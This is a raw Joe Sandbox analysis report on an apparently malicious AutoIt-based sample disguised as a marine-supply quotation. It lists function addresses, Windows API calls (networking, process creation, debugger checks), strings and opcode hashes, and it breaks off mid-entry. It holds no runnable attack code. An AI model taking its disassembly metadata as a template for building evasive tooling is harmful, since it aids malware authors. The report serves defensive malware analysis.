                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend
                                                                            • String ID: '
                                                                            • API String ID: 3850602802-1997036262
                                                                            • Opcode ID: 4f1bacdf424a9fbb1bf897476e5aaf55201071da43b55ac66922e52f80d5a441
                                                                            • Instruction ID: a752549fbaf5f5daf1f58d23bea7a1c62bb8a1ca71e353e2a45c45ddedeb9e92
                                                                            • Opcode Fuzzy Hash: 4f1bacdf424a9fbb1bf897476e5aaf55201071da43b55ac66922e52f80d5a441
                                                                            • Instruction Fuzzy Hash: A8313874A012099FDB14CFA9C9A0FEABBB6FF09300F50406AE905AB341DB70A941CF90
                                                                            Function 006B304E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 90networkCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 006B335B: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,?,?,006B3077,?,?), ref: 006B3378
                                                                            • inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 006B307A
                                                                            • htons.WSOCK32(00000000,?,?,00000000), ref: 006B3106
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: ByteCharMultiWidehtonsinet_addr
                                                                            • String ID: 255.255.255.255
                                                                            • API String ID: 2496851823-2422070025
                                                                            • Opcode ID: 231eb1e8d8ebe3b54efb652d76089d3064683097eed8c36f2dc4dd936ea388c1
                                                                            • Instruction ID: f177f6ec0a43c86bff7022a6bdb23832527a2c0eb95e4a764b93a5a7f4e1373e
                                                                            • Opcode Fuzzy Hash: 231eb1e8d8ebe3b54efb652d76089d3064683097eed8c36f2dc4dd936ea388c1
                                                                            • Instruction Fuzzy Hash: 1031E4B57002119FC710DF2CC585EEA7BE6EF14318F248059E9158B392DB71DE85CB60
                                                                            Function 006C31EF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 006C327C
                                                                            • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 006C3287
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend
                                                                            • String ID: Combobox
                                                                            • API String ID: 3850602802-2096851135
                                                                            • Opcode ID: ed60da6776c494b70b7a76675d8223e13ffb965ff6cab5e019d647b580810f4c
                                                                            • Instruction ID: cb1bc8deaf4d1a1309293f1fa2d72052f316cd63a908be7764909037fac139b8
                                                                            • Opcode Fuzzy Hash: ed60da6776c494b70b7a76675d8223e13ffb965ff6cab5e019d647b580810f4c
                                                                            • Instruction Fuzzy Hash: 9F11D071200218BFEF219F54DC84FFB376BEB94364F108129F91897390D6399E518760
                                                                            Function 006C3710 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 0063600E: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0063604C
                                                                              • Part of subcall function 0063600E: GetStockObject.GDI32(00000011), ref: 00636060
                                                                              • Part of subcall function 0063600E: SendMessageW.USER32(00000000,00000030,00000000), ref: 0063606A
                                                                            • GetWindowRect.USER32(00000000,?), ref: 006C377A
                                                                            • GetSysColor.USER32(00000012), ref: 006C3794
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                                            • String ID: static
                                                                            • API String ID: 1983116058-2160076837
                                                                            • Opcode ID: 7d1388197c90dba0fa1f5a61cb71b5e30964ccf7cd5b77ef77a33d9140c730e5
                                                                            • Instruction ID: 46ceb304312b864c252ea539a538b802038ad2dcc0af9b3d5267366c6b64c201
                                                                            • Opcode Fuzzy Hash: 7d1388197c90dba0fa1f5a61cb71b5e30964ccf7cd5b77ef77a33d9140c730e5
                                                                            • Instruction Fuzzy Hash: C41129B2610219AFDB01DFA8CC4AEFA7BB9EB09314F008518F955E2250D735E9519B64
                                                                            Function 006ACD1E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66networkCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 006ACD7D
                                                                            • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 006ACDA6
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: Internet$OpenOption
                                                                            • String ID: <local>
                                                                            • API String ID: 942729171-4266983199
                                                                            • Opcode ID: b9d782a1a87f1f244a82c01a5206a26ea70dfef38515552063f4634aaa13beaf
                                                                            • Instruction ID: fdd36a40b1ed88c68f007da3d8de6a63243b90e478bab0cfa2519c315d477541
                                                                            • Opcode Fuzzy Hash: b9d782a1a87f1f244a82c01a5206a26ea70dfef38515552063f4634aaa13beaf
                                                                            • Instruction Fuzzy Hash: 1811A071205635BAD7286B668C49EF7BEAAEF537B4F00422AB11982280D7609C41DAF0
                                                                            Function 006C3429 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetWindowTextLengthW.USER32(00000000), ref: 006C34AB
                                                                            • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 006C34BA
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: LengthMessageSendTextWindow
                                                                            • String ID: edit
                                                                            • API String ID: 2978978980-2167791130
                                                                            • Opcode ID: de871236927d75a7802b0ba678ee1c3c8af3e9f6948ca80ad2157a8ebc5eeca2
                                                                            • Instruction ID: 462a0bda692503b37f28cf95d772b1e7de9cdff52bd58374aa8e005a6b718c12
                                                                            • Opcode Fuzzy Hash: de871236927d75a7802b0ba678ee1c3c8af3e9f6948ca80ad2157a8ebc5eeca2
                                                                            • Instruction Fuzzy Hash: 2B115871500218AAEB268F64DC84FFA36ABEB05374F50C328F965933E0C775DD519B64
                                                                            Function 00691CDE Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 00693CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00693CCA
                                                                            • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00691D4C
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: ClassMessageNameSend
                                                                            • String ID: ComboBox$ListBox
                                                                            • API String ID: 3678867486-1403004172
                                                                            • Opcode ID: 1365887e59f4c01bf87b3219d75068ebb393238d8686d09dea73405753a742a9
                                                                            • Instruction ID: 1f3dccefaaafbb6025980e3e3f65593932d963b0959bb68d1f294a4508d6d8e7
                                                                            • Opcode Fuzzy Hash: 1365887e59f4c01bf87b3219d75068ebb393238d8686d09dea73405753a742a9
                                                                            • Instruction Fuzzy Hash: 9E01B571601219AB8F08EBA4CD55CFE776EEF47360B14091DE8225B7C1EA70590C8AA0
                                                                            Function 00691BD8 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 00693CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00693CCA
                                                                            • SendMessageW.USER32(?,00000180,00000000,?), ref: 00691C46
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: ClassMessageNameSend
                                                                            • String ID: ComboBox$ListBox
                                                                            • API String ID: 3678867486-1403004172
                                                                            • Opcode ID: 3b083636e5370711a66e65b1d18082f29c1721a302765472f32968ed1356b781
                                                                            • Instruction ID: 1dd202d2f2462897c94a6754dc24f6599000273ee71fd1e6c23a0e167098d548
                                                                            • Opcode Fuzzy Hash: 3b083636e5370711a66e65b1d18082f29c1721a302765472f32968ed1356b781
                                                                            • Instruction Fuzzy Hash: 6E01F771684109A6CF08EB90CA51DFF77AE9F12340F20001DB506A7681EA749E08C6B5
                                                                            Function 00691C5C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 00693CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00693CCA
                                                                            • SendMessageW.USER32(?,00000182,?,00000000), ref: 00691CC8
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: ClassMessageNameSend
                                                                            • String ID: ComboBox$ListBox
                                                                            • API String ID: 3678867486-1403004172
                                                                            • Opcode ID: 78098bd225eb4247c1804b9967505cd5a6aa8f951fa85734c9e8ce4cc11be947
                                                                            • Instruction ID: 676ec174be88f53bec81d45a95a755c7cb25ddd6be3e70ad5872727b5475768a
                                                                            • Opcode Fuzzy Hash: 78098bd225eb4247c1804b9967505cd5a6aa8f951fa85734c9e8ce4cc11be947
                                                                            • Instruction Fuzzy Hash: 7201F975780119A7CF04EBA0CB11EFF77AE9F12340F64041AB902B7781EAA49F08C6B5
                                                                            Function 00691D68 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 46windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 00693CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00693CCA
                                                                            • SendMessageW.USER32(?,0000018B,00000000,00000000), ref: 00691DD3
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: ClassMessageNameSend
                                                                            • String ID: ComboBox$ListBox
                                                                            • API String ID: 3678867486-1403004172
                                                                            • Opcode ID: 82dff157326f5c74eb43f91794c5540e7c836e35342aa153a8a3f7ac10c99457
                                                                            • Instruction ID: cd4589baa5e89141154c8ebd76335e1f6a74e0591bf7319a7236c91b0144ab9f
                                                                            • Opcode Fuzzy Hash: 82dff157326f5c74eb43f91794c5540e7c836e35342aa153a8a3f7ac10c99457
                                                                            • Instruction Fuzzy Hash: 18F0A475A4121966DF08E7A4CD52EFE777EAF02350F140919B922A76C1DAB0590C8AB4
                                                                            Function 006C8172 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 40processCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00703018,0070305C), ref: 006C81BF
                                                                            • CloseHandle.KERNEL32 ref: 006C81D1
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: CloseCreateHandleProcess
                                                                            • String ID: \0p
                                                                            • API String ID: 3712363035-363088137
                                                                            • Opcode ID: 2ca65fb3f8e70bcc92879bab7bb6d0a86f702a34f6276347ebdf6fcc2be40295
                                                                            • Instruction ID: 49cf328b612d3b0da2fca015b3c65d22e1ca3ef1e1337dd9d1500609f6ce5897
                                                                            • Opcode Fuzzy Hash: 2ca65fb3f8e70bcc92879bab7bb6d0a86f702a34f6276347ebdf6fcc2be40295
                                                                            • Instruction Fuzzy Hash: DEF03AB1641300FAF3206765AC49FB73A9EEB05751F008465BA0CD61A2DA6A8A0482E8
                                                                            Function 00690B15 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 28windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00690B23
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: Message
                                                                            • String ID: AutoIt$Error allocating memory.
                                                                            • API String ID: 2030045667-4017498283
                                                                            • Opcode ID: dd1b93a42a6301a2675d94c361a55fa8e1c852ea93432be537bfd4995824f5c0
                                                                            • Instruction ID: 98e20eb65bbf7d5deae9e07820590d7d48fd774ea98822c4afa36868b98e06e5
                                                                            • Opcode Fuzzy Hash: dd1b93a42a6301a2675d94c361a55fa8e1c852ea93432be537bfd4995824f5c0
                                                                            • Instruction Fuzzy Hash: 78E04F322843583AD3543B94BC07FD97A8BCF05B65F10446EFB9C959C38AE268A056ED
                                                                            Function 00650D42 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 0064F7C9: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,00650D71,?,?,?,0063100A), ref: 0064F7CE
                                                                            • IsDebuggerPresent.KERNEL32(?,?,?,0063100A), ref: 00650D75
                                                                            • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,0063100A), ref: 00650D84
                                                                            Strings
                                                                            • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00650D7F
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString
                                                                            • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                                            • API String ID: 55579361-631824599
                                                                            • Opcode ID: 7d756b605c935286ea42047c39a707b24609a9a6d423259630b3986af14c0d82
                                                                            • Instruction ID: f95792aa6bc30a5def0b53ef434b3120caa33ad148038ca738accb69551b9215
                                                                            • Opcode Fuzzy Hash: 7d756b605c935286ea42047c39a707b24609a9a6d423259630b3986af14c0d82
                                                                            • Instruction Fuzzy Hash: F8E06D702003418BE3609FB8E804B52BBF3EF04741F008A2DE886C6651DBB9E4488B91
                                                                            Function 006A3017 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 18COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetTempPathW.KERNEL32(00000104,?,00000001), ref: 006A302F
                                                                            • GetTempFileNameW.KERNEL32(?,aut,00000000,?), ref: 006A3044
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: Temp$FileNamePath
                                                                            • String ID: aut
                                                                            • API String ID: 3285503233-3010740371
                                                                            • Opcode ID: ee42d4edd35fc0bb3c360422f9d0f53892645938e7f9035ca51c3719982794bd
                                                                            • Instruction ID: 797aaea68461ce2e1f98438b82be87e6d6900bbd9b8c1a12ca84163d848ed65a
                                                                            • Opcode Fuzzy Hash: ee42d4edd35fc0bb3c360422f9d0f53892645938e7f9035ca51c3719982794bd
                                                                            • Instruction Fuzzy Hash: 5DD05E7250032867DB20E7A4AC0EFEB3A6CDB04760F0002A1B659E20A1DAB49A84CAD0
                                                                            Function 0068D21C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 17timeCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: LocalTime
                                                                            • String ID: %.3d$X64
                                                                            • API String ID: 481472006-1077770165
                                                                            • Opcode ID: 6ca6b55ad85e076b2e0e8212d1229d42c61bf1b03ba02551f4ecf4aa133faf23
                                                                            • Instruction ID: 6d6c1506e4ab50e8b47750e348b9e99c0c3c099dc2a93ea21e2b95a1e5a0ec4f
                                                                            • Opcode Fuzzy Hash: 6ca6b55ad85e076b2e0e8212d1229d42c61bf1b03ba02551f4ecf4aa133faf23
                                                                            • Instruction Fuzzy Hash: 22D01261C08108F9CB90A7D0DC59CB9B37FEB18301F508552FA06A2080D624C70A6771
                                                                            Function 006C2356 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 006C236C
                                                                            • PostMessageW.USER32(00000000), ref: 006C2373
                                                                              • Part of subcall function 0069E97B: Sleep.KERNEL32 ref: 0069E9F3
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: FindMessagePostSleepWindow
                                                                            • String ID: Shell_TrayWnd
                                                                            • API String ID: 529655941-2988720461
                                                                            • Opcode ID: ced91bb7898d60cf54f9a041e024cb177e403d7b4991ca6ed158ec356c52d464
                                                                            • Instruction ID: e6c102ee4a171d77ce46e68e23c3ba7b1b0d05619ff61cbf858fc9f8a3b831e6
                                                                            • Opcode Fuzzy Hash: ced91bb7898d60cf54f9a041e024cb177e403d7b4991ca6ed158ec356c52d464
                                                                            • Instruction Fuzzy Hash: B5D0C9327813107AE6A4B771DC0FFD6661A9B04B24F41591AB74AEA1D0C9A5A8018A58
                                                                            Function 006C2322 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
